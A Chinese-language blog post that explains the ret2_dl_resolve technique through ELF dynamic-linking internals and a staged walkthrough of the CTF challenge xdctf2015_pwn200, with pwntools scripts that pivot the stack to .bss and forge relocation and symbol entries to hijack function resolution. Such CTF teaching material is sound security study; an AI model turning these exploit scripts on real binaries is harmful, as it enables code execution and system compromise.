<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="知识点这篇文章从HWS计划2020安全精英夏令营、[ctf wiki](ret2dlresolve - CTF Wiki (ctf-wiki.org))以及[新手向]ret2dl-resolve详解 - 知乎 (zhihu.com)中整理写出  32位下  ELF 程序的基本相关结构  ELF 可执行文件由 ELF 头部，程序头部表和其对应的段，节区头部表和其对应的节组成。如果一个可执行文件参与动">
<meta property="og:type" content="article">
<meta property="og:title" content="ret2_dl_resolve">
<meta property="og:url" content="https://github.com/CharonPt/CharonPt.github.io.git/2022/02/04/ret2_dl_resolve/index.html">
<meta property="og:site_name" content="CharonPt的Blog">
<meta property="og:description" content="知识点这篇文章从HWS计划2020安全精英夏令营、[ctf wiki](ret2dlresolve - CTF Wiki (ctf-wiki.org))以及[新手向]ret2dl-resolve详解 - 知乎 (zhihu.com)中整理写出  32位下  ELF 程序的基本相关结构  ELF 可执行文件由 ELF 头部，程序头部表和其对应的段，节区头部表和其对应的节组成。如果一个可执行文件参与动">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/readelf-1.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/readelf-2.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/dynamic.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/readelf-3.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/got.plt.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/readelf-4.png">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/dynstr.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/call_plt.png">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/first_got.png">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/call_dl_resolve.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/GOT+4.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/dl_resolve_ass.png">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/pwn200-checksec.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/pwn200-main.png">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/pwn200-vuln.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/pwn200-task1.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/pwn200-task2.png">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/pwn200-task3.jpg">
<meta property="og:image" content="https://github.com/2022/02/04/ret2_dl_resolve/pwn200-task4.jpg">
<meta property="article:published_time" content="2022-02-03T20:39:18.000Z">
<meta property="article:modified_time" content="2022-03-04T05:52:11.569Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="ret2_dl_resolve">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/2022/02/04/ret2_dl_resolve/readelf-1.jpg">

<link rel="canonical" href="https://github.com/CharonPt/CharonPt.github.io.git/2022/02/04/ret2_dl_resolve/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ret2_dl_resolve | CharonPt的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">CharonPt的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/CharonPt/CharonPt.github.io.git/2022/02/04/ret2_dl_resolve/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="CharonPt的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ret2_dl_resolve
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-02-04 04:39:18" itemprop="dateCreated datePublished" datetime="2022-02-04T04:39:18+08:00">2022-02-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-03-04 13:52:11" itemprop="dateModified" datetime="2022-03-04T13:52:11+08:00">2022-03-04</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h2><p>这篇文章从<a target="_blank" rel="noopener" href="https://study.163.com/course/courseMain.htm?courseId=1212430806&_trace_c_p_k2_=5f25e3cfc98742df8494d8a0a8c8bc12">HWS计划2020安全精英夏令营</a>、[ctf wiki](<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/advanced-rop/ret2dlresolve/#pwntools">ret2dlresolve - CTF Wiki (ctf-wiki.org)</a>)以及[<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/37572651">新手向]ret2dl-resolve详解 - 知乎 (zhihu.com)</a>中整理写出</p>
<ul>
<li><p>32位下</p>
<ul>
<li><p>ELF 程序的基本相关结构</p>
<ul>
<li><p>ELF 可执行文件由 ELF 头部，程序头部表和其对应的段，节区头部表和其对应的节组成。如果一个可执行文件参与动态链接，它的程序头部表将包含类型为 <strong>PT_DYNAMIC</strong> 的段，其包含 <strong>.dynamic</strong> 节区。结构如下（32位为例）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">typedef struct &#123;</span><br><span class="line">	ELF32_Sword d_tag;</span><br><span class="line">	union&#123;</span><br><span class="line">		ELF32_Word	d_val;</span><br><span class="line">		ELF32_Addr	d_ptr;</span><br><span class="line">	&#125; d_un;</span><br><span class="line">&#125; ELF32_Dyn;</span><br></pre></td></tr></table></figure></li>
<li><p>节区中包含目标文件所有信息</p>
</li>
<li><p>如图，列出了某个文件的28个节区。其中类型为 REL 的节区包含重定位表项</p>
<img src="/2022/02/04/ret2_dl_resolve/readelf-1.jpg" class>

<img src="/2022/02/04/ret2_dl_resolve/readelf-2.jpg" class>

<ul>
<li><p>.dynamic 包含了很多动态链接所需的关键信息，我们现在只关心<code>DT_STRTAB</code>, <code>DT_SYMTAB</code>, <code>DT_JMPREL</code>这三项，这三个东西分别包含了指向<code>.dynstr</code>, <code>.dynsym</code>, <code>.rel.plt</code>这3个section的指针，可以<code>readelf -S hellopwn</code>看一下，会发现这三个section的地址跟在下图所示的地址是一样的。</p>
<img src="/2022/02/04/ret2_dl_resolve/dynamic.jpg" class></li>
<li><p>其中 .rel.plt 节是<strong>函数</strong>重定位表，也是一个结构体数组，每个项对应一个导入函数，结构体定义如下。.rel.dyn 节用于<strong>变量</strong>重定位</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> &#123;</span></span><br><span class="line">	ELF32_Addr r_offset;	<span class="comment">//对于可执行文件，此值为虚拟地址</span></span><br><span class="line">	ELF32_Word r_info;		<span class="comment">//符号表索引</span></span><br><span class="line">&#125; ELF32_Rel;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> ELF32_R_SYM(i) ((i)&gt;&gt;8)		<span class="comment">//该宏定义将传进来的值右移8位（去掉低一字节）</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> ELF32_R_TYPE(i) ((unsigned char)(i))	<span class="comment">//该宏定义取传进来的值的低一字节</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> ELF32_R_INFO(s,t) (((s)&lt;&lt;8) + (unsigned char)(t))</span></span><br></pre></td></tr></table></figure>

<p>我们用 readelf -r 即可查看目标文件 REL 节区的相关信息</p>
<img src="/2022/02/04/ret2_dl_resolve/readelf-3.jpg" class>

<p>对于导入函数来说，其 r_info 的最低一字节都是 0x7</p>
</li>
<li><p>.got 节保存全局变量偏移表，.got.plt 节存储着全局函数偏移表。.got.plt 对应着 ELF32_Rel 结构中 r_offset 的值。例如上图中 REL 节区中的 write 函数，其 r_offset = 0x804a010，即其在got表中位于 0x804a010 </p>
<img src="/2022/02/04/ret2_dl_resolve/got.plt.jpg" class></li>
<li><p>.dynsym 节区包含了动态链接符号表（结构体数组）每个项同样对应一个导入函数。其中，ELF32_Sym[num]中的 num 对应着 <code>ELF32_R_SYM(ELF32_Rel-&gt;r_info)</code>。根据定义，<code>ELF32_R_SYM(ELF32_Rel-&gt;r_info) = ELF32_Rel-&gt;r_info &gt;&gt; 8</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    Elf32_Word st_name; <span class="comment">// 符号名，是相对.dynstr起始的偏移</span></span><br><span class="line">    Elf32_Addr st_value;</span><br><span class="line">    Elf32_Word st_size;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> st_info; <span class="comment">//对于导入函数符号而言，它是0x12</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> st_other;</span><br><span class="line">    Elf32_Section st_shndx;</span><br><span class="line">&#125; Elf32_Sym; <span class="comment">//对于导入函数符号而言，未标注的字段都是0</span></span><br></pre></td></tr></table></figure>

<p>注意一个 ELF32_Sym 结构体的大小为 0x10 个字节</p>
<p>例如当程序想查找一个函数对应的 ELF32_Sym 结构体时，就会在取出其 ELF32_Rel-&gt;r_info 的值并用 ELF32_R_SYM() 操作（即右移8位），由此得出下标num。</p>
<p>例如上图中 REL 节区中的 write 函数，其 r_info = 0x507，<code>ELF32_R_SYM(ELF32_Rel-&gt;r_info) = 0x507 &gt;&gt; 8 = 5</code>，而 ELF32_Sym[5] 即保存着write的符号表信息。</p>
<p>用 readelf -s 就能查看 Sym 结构</p>
<img src="/2022/02/04/ret2_dl_resolve/readelf-4.png" class>

<p>并且 <code>ELF32_R_TYPE(0x507) = 7</code>，对应 <code>R_386_JUMP_SLOT</code></p>
</li>
<li><p>.dynstr 节包含了动态链接所需的字符串。这个节区以 \x00 作为开始和结束，中间每个字符串也以 \x00 间隔。相关数据结构引用一个字符串时，用的是<strong>相对这个section头的偏移</strong>，比方说，在这里，就是字符串相对0x804821C的偏移。</p>
<img src="/2022/02/04/ret2_dl_resolve/dynstr.jpg" class></li>
<li><p>.plt节是过程链接表。过程链接表把位置独立的函数调用重定向到绝对位置。</p>
<p>程序call一个函数的plt时，执行流如下（以write函数为例）：</p>
<p>call write@plt -&gt; 跳转至 0x80483c0 执行，该地址处有三条汇编代码，如下：</p>
<img src="/2022/02/04/ret2_dl_resolve/call_plt.png" class>

<p>而 0x804a010 处是write的got表的位置，在ELF采用延迟绑定技术时，程序还未执行过某个函数时，该函数的got表内存放的是该函数 plt+6 的地址，如下：</p>
<img src="/2022/02/04/ret2_dl_resolve/first_got.png" class>

<p>所以程序就相当于继续执行 0x80483c6 处的汇编，把 _dl_runtime_resolve() 的第二个参数 <strong>reloc_arg = 0x20</strong> 作为参数压栈，然后 <code>jmp 0x8048370</code>，该地址处的汇编代码如下：</p>
<img src="/2022/02/04/ret2_dl_resolve/call_dl_resolve.jpg" class>

<p>0x8048370 再把 *<em>link_map = <em>(GOT+4)</em></em> 压栈（整个got表+4的位置，这个位置是一个link_map的指针，是在程序加载的时候就写入的。link map这个结构我们不关心，但是要知道它包含了<code>.dynamic</code>的指针，通过这个<code>link_map</code>，<code>_dl_runtime_resolve</code>函数可以访问到<code>.dynamic</code>这个section）</p>
<img src="/2022/02/04/ret2_dl_resolve/GOT+4.jpg" class>

<p>而 *(GOT+8) 中保存的是 _dl_runtime_resolve() 函数的地址，由此就相当于执行了 <code>_dl_runtime_reslove(link_map,reloc_arc)</code>，由该函数完成符号的解析，将write函数的真实地址写入其got表中，随后把控制权交给write函数</p>
</li>
</ul>
</li>
</ul>
</li>
<li><p>其中 _dl_runtime_resolve() 是在 glibc-2.22/sysdeps/i386/dl-trampoline.S 中用汇编实现的，其代码如下</p>
<img src="/2022/02/04/ret2_dl_resolve/dl_resolve_ass.png" class>

<p>0xf7fee00b 处即调用 <code>_dl_fixup</code>，并且通过寄存器传参。<code>_dl_fixup</code>是在 glibc-2.22/elf/dl_runtime.c 实现的，我们只需要关注一些主要函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_dl_fixup(struct link_map *l, ELFW(Word) reloc_arg)</span><br></pre></td></tr></table></figure>

<ul>
<li><p>首先通过参数 reloc_arg 计算重定位入口，这里的<code>JMPREL</code>即<code>.rel.plt</code>，<code>reloc_offset</code>即<code>reloc_arg</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> PLTREL *<span class="keyword">const</span> reloc = (<span class="keyword">const</span> <span class="keyword">void</span> *) (D_PTR (l,l_info[DT_JMPREL]) + reloc_offset);</span><br></pre></td></tr></table></figure>

<p>所以由此得出的 reloc 就是该函数在 .rel.plt 节所对应的结构体</p>
</li>
<li><p>然后通过 reloc-&gt;r_info 找到 .dynsym 中对应的条目</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">const</span> <span class="title">ELFW</span><span class="params">(Sym)</span> *sym </span>= &amp;symtab[ELFW(R_SYM)(reloc-&gt;r_info)];</span><br></pre></td></tr></table></figure>

<p>其中 symtab[] 就是 .dynsym 中的结构体数组，由 <code>ELFW(R_SYM)(reloc-&gt;r_info)</code> 该步操作得出其下标（<code>ELFW(R_SYM)(i)</code>是前面讲过的宏定义），最后取地址赋值给指针 sym，该操作在介绍 .dynsym 节的内容时已经讲过</p>
<p>这里还会检查 reloc-&gt;r_info 的最低位是不是等于 <code>R_386_JUMP_SLOT</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">assert (ELFW(R_TYPE)(reloc-&gt;r_info) == ELF_MACHINE_JMP_SLOT);</span><br></pre></td></tr></table></figure></li>
<li><p>接着通过 strtab + sym-&gt;st_name 找到符号表字符串，result为libc基址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">result = _dl_lookup_symbol_x (strtab + sym-&gt;st_name,l,&amp;sym,l-&gt;l_scope,version,ELF_RTYPE_CLASS_PLT,flags,NULL);</span><br></pre></td></tr></table></figure></li>
<li><p>value为libc基址加上要解析的函数的偏移地址，由此得到实际地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">value = DL_FIXUP_MAKE_VALUE (result,sym ? (LOOKUP_VALUE_ADDRESS (result) + sym-&gt;st_value) : 0);</span><br></pre></td></tr></table></figure>

<p>由此步我们得知其实最后决定value的值的是函数经过前面层层步骤最后得到的函数名字的字符串，函数会用得到的要解析的函数名称的字符串去表里寻找，从而匹配得到要解析的函数的真实地址。</p>
</li>
<li><p>最后把value写入相应的got表条目中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">return elf_machine_fixup_plt (l,result,reloc.rel_addr,value);</span><br></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p>漏洞利用流程</p>
<ol>
<li>控制 EIP 为 PLT[0] 的地址，只需要传递一个 reloc_arg 参数</li>
<li>控制 reloc_arg 的大小，使 reloc 的位置落在可控地址内</li>
<li>伪造 reloc 的内容，使 sym 落在可控地址内</li>
<li>伪造 sym 的内容，使 name 落在可控地址内</li>
<li>伪造 name 为任意库函数名称，如 system</li>
</ol>
</li>
</ul>
</li>
</ul>
<h2 id="xdctf2015-pwn200"><a href="#xdctf2015-pwn200" class="headerlink" title="xdctf2015_pwn200"></a>xdctf2015_pwn200</h2><p>以这道经典例题为例一步步理解漏洞的利用流程</p>
<p>程序保护如下</p>
<img src="/2022/02/04/ret2_dl_resolve/pwn200-checksec.jpg" class>

<p>RELRO没有全开是ret2_dl_resolve所必须的条件之一</p>
<p>main函数如下</p>
<img src="/2022/02/04/ret2_dl_resolve/pwn200-main.png" class>

<p>vuln函数如下</p>
<img src="/2022/02/04/ret2_dl_resolve/pwn200-vuln.jpg" class>

<p>漏洞只是一个栈溢出，接下来我们尝试一步一步完成ret2_dl_resolve的攻击流程</p>
<h5 id="stage-1"><a href="#stage-1" class="headerlink" title="stage 1"></a>stage 1</h5><p>我们将栈迁移到 .bss 段，然后尝试用伪造的 Rel 结构体来让 _dl_runtime_resolve 函数成功解析，这部分的exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;i386&#x27;</span></span><br><span class="line">p = process(<span class="string">&quot;./bof&quot;</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./bof&quot;</span>)</span><br><span class="line">bss_addr = elf.bss()</span><br><span class="line">pop_ebp = <span class="number">0x0804862b</span></span><br><span class="line">p3_ret = <span class="number">0x08048629</span></span><br><span class="line">leave_ret = <span class="number">0x0804851A</span></span><br><span class="line">binsh = <span class="string">&#x27;/bin/sh\x00&#x27;</span></span><br><span class="line">base_stage = bss_addr + <span class="number">0x800</span></span><br><span class="line">binsh_addr = base_stage + <span class="number">80</span></span><br><span class="line">plt0 = <span class="number">0x08048370</span></span><br><span class="line"></span><br><span class="line">rel_plt = <span class="number">0x08048324</span></span><br><span class="line">r_info = <span class="number">0x607</span></span><br><span class="line">fake_rel = p32(elf.got[<span class="string">&#x27;write&#x27;</span>]) + p32(r_info)</span><br><span class="line">fake_rel_addr = base_stage + <span class="number">28</span> <span class="comment">#28是fake_rel在base_stage中的偏移</span></span><br><span class="line">reloc_arg = fake_rel_addr - rel_plt</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x70</span> + p32(elf.plt[<span class="string">&#x27;read&#x27;</span>]) + p32(p3_ret) + p32(<span class="number">0</span>) + p32(base_stage) + p32(<span class="number">0x100</span>) + p32(pop_ebp) + p32(base_stage) + p32(leave_ret)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Welcome to XDCTF2015~!\n&quot;</span>,payload)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">payload = <span class="string">&#x27;aaaa&#x27;</span></span><br><span class="line">payload += p32(plt0)</span><br><span class="line">payload += p32(reloc_arg)</span><br><span class="line">payload += <span class="string">&#x27;aaaa&#x27;</span></span><br><span class="line">payload += p32(<span class="number">1</span>)</span><br><span class="line">payload += p32(binsh_addr)</span><br><span class="line">payload += p32(<span class="built_in">len</span>(binsh))</span><br><span class="line"><span class="comment">#fake_rel</span></span><br><span class="line">payload += fake_rel</span><br><span class="line">payload = payload.ljust(<span class="number">80</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += binsh</span><br><span class="line">payload = payload.ljust(<span class="number">100</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<img src="/2022/02/04/ret2_dl_resolve/pwn200-task1.jpg" class>

<p>可见我们伪造的 Rel 结构体同样能让程序成功解析并输出’/bin/sh’字符串，其中exp中的所需信息用 <code>readelf</code> 去找即可。</p>
<h5 id="stage-2"><a href="#stage-2" class="headerlink" title="stage 2"></a>stage 2</h5><p>在上一阶段中我们伪造的 Rel 结构体与write函数原本的 Rel 结构体完全相同。接下来尝试更改伪造的 r_info 使得程序用我们伪造的 Sym 结构体去寻找我们控制的 st_name。</p>
<p>我们先查看write函数原本对应的 Sym 结构体是怎样的，我们查看了write函数的 r_info = 0x607，<code>0x607 &gt;&gt; 8 = 0x6 </code>，所以write函数对应的 Sym 结构体是 .dynsym 节的第七个，因为一个 ELF32_Sym 结构体的大小为 0x10 个字节，所以也可以算出其地址为 <code>dynsym_addr + (0x607&gt;&gt;8)*0x10</code>，我们再查看 .dynsym 节</p>
<img src="/2022/02/04/ret2_dl_resolve/pwn200-task2.png" class>

<p>由此我们得知了write函数所对应的 st_name = 0x4c</p>
<p>这部分exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">dynsym = <span class="number">0x080481cc</span></span><br><span class="line">fake_sym_addr = base_stage + <span class="number">36</span></span><br><span class="line">align = <span class="number">0x10</span> - ((fake_sym_addr - dynsym) &amp; <span class="number">0xf</span>)</span><br><span class="line">fake_sym_addr = fake_sym_addr + align</span><br><span class="line">r_info = ((fake_sym_addr - dynsym)/<span class="number">0x10</span>&lt;&lt;<span class="number">8</span>)|<span class="number">0x7</span></span><br><span class="line">fake_rel = p32(elf.got[<span class="string">&#x27;write&#x27;</span>]) + p32(r_info)</span><br><span class="line">fake_rel_addr = base_stage + <span class="number">28</span></span><br><span class="line">reloc_arg = fake_rel_addr - rel_plt</span><br><span class="line"></span><br><span class="line">st_name = <span class="number">0x4c</span></span><br><span class="line">fake_sym = p32(st_name) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(<span class="number">0x12</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x70</span> + p32(elf.plt[<span class="string">&#x27;read&#x27;</span>]) + p32(p3_ret) + p32(<span class="number">0</span>) + p32(base_stage) + p32(<span class="number">0x100</span>) + p32(pop_ebp) + p32(base_stage) + p32(leave_ret)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Welcome to XDCTF2015~!\n&quot;</span>,payload)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;aaaa&#x27;</span></span><br><span class="line">payload += p32(plt0)</span><br><span class="line">payload += p32(reloc_arg)</span><br><span class="line">payload += <span class="string">&#x27;aaaa&#x27;</span></span><br><span class="line">payload += p32(<span class="number">1</span>)</span><br><span class="line">payload += p32(binsh_addr)</span><br><span class="line">payload += p32(<span class="built_in">len</span>(binsh))</span><br><span class="line"><span class="comment">#fake_rel</span></span><br><span class="line">payload += fake_rel</span><br><span class="line"><span class="comment">#fake_sym</span></span><br><span class="line">payload += <span class="string">&#x27;a&#x27;</span>*align</span><br><span class="line">payload += fake_sym</span><br><span class="line">payload = payload.ljust(<span class="number">80</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += binsh</span><br><span class="line">payload = payload.ljust(<span class="number">100</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br></pre></td></tr></table></figure>

<p>因为 Sym 结构体是根据 <code>&amp;symtab[ELFW(R_SYM)(reloc-&gt;r_info)]</code> 这样去找的，也就相当于 <code>dynsym + (reloc-&gt;r_info &gt;&gt; 8)*0x10</code> ，所以每个 Sym 结构体跟 .dynsym 节的起始地址的偏移都是按 0x10 个字节对齐的，即 <code>(fake_sym_addr - dynsym)%0x10 == 0</code> ，所以只要让 <code>(fake_sym_addr - dynsym)&amp;0xf + x = 0x10</code> 即可，这个 x 就是exp中作padding的align。</p>
<p>同理，做个简单的逆运算即可得出 <code>r_info = ((fake_sym_addr - dynsym)/0x10 &lt;&lt; 8</code>，因为先左移了8位，所以直接 <code>|0x7</code> 来确保 r_info 的最低一字节是 0x7（知识点中说过会有一个检查）</p>
